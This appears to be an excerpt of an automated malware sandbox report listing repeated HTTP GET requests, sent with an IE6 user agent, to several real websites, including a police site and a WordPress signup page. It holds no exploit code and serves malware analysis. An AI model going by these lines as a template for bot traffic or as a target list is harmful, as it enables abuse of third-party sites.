                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.coCookie: d55e479f054c94814cbc10d217aaa990=bbd2a9ecd1f16e6deb08a6c096c7155a
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.coCookie: d55e479f054c94814cbc10d217aaa990=85e4e1a68595ff47778d80e98dbe0065
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.coCookie: d55e479f054c94814cbc10d217aaa990=bbd2a9ecd1f16e6deb08a6c096c7155a
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.netContent-Length: 5372
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.netContent-Length: 4428
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.netContent-Length: 5076
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.netContent-Length: 4272
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.netContent-Length: 3856
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.netContent-Length: 5372
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.ukContent-Length: 4336
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.netContent-Length: 5076
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.netContent-Length: 4272
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.coCookie: d55e479f054c94814cbc10d217aaa990=bbd2a9ecd1f16e6deb08a6c096c7155a
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.coCookie: d55e479f054c94814cbc10d217aaa990=85e4e1a68595ff47778d80e98dbe0065
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.coCookie: d55e479f054c94814cbc10d217aaa990=85e4e1a68595ff47778d80e98dbe0065
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.netContent-Length: 4868
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
